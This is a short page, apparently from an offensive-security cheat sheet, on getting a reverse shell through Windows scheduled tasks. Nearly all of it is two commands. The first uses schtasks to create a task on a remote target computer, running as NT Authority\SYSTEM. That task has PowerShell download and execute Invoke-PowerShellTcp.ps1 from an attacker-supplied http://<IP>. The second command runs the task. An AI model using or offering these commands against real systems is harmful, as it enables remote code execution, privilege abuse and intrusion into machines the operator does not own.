Scheduled Tasks

Get a reverse shell using Scheduled Tasks

schtasks /create /S <TARGET COMPUTER NAME> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<TASK NAME>" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<IP>/Invoke-PowerShellTcp.ps1''')'"

Run it by

schtasks /Run /S <TARGET COMPUTER NAME> /TN "<TASK NAME>"
PreviousPowerShellNextSocat

Last updated